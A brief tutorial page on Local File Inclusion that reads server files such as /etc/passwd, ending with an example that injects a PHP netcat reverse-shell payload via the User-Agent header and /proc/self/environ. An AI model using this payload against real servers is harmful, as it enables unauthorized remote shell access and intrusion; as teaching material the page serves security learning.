Local File Inclusion
What is a Local File Inclusion?
This vulnerability allows an attacker to read files from inside the server, such as /etc/passwd or others.
Quick Example
By changing the file that the page parameter loads, we can read other files outside the www directory, and we can try to exploit them to gain access with a shell.
Here the request points to /proc/self/environ, and we modify our User-Agent to:
<? passthru("nc -e /bin/bash <host> <port>"); ?>
Forward the requests and you will see that you get a shell.
Examples and Info:
Directory Traversal